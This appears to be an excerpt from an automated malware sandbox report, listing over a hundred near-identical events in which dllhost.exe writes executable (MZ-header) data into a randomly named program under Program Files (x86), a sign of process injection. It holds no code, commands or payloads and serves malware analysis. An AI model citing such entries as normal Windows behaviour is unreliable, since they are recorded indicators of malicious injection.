Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: B60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1320000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 420000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 440000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1320000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1050000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1070000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 13D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 13F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1320000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 720000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 780000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: AD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: AF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: DC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: DE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: DF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 5C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 550000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: DE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: E00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 780000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 7A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1320000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1470000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1490000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: F70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: F90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1220000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1240000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1370000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1390000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1230000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1250000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: F40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 480000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 4A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: C30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: C50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1270000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1290000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 13D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 13F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: DB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: AB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: AD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: CD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: CF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 6F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 710000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: C60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: C80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: FC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: FD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: FF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: AE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: B00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1390000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 13B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: FD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: FF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 11D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 11F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: D80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 630000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 650000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1170000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1130000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: A20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: A40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: D20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: D40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: F80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 780000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 7A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 920000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: F00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: F20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: F40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: C00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: C20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 800000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 820000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1230000 value starts with: 4D5A
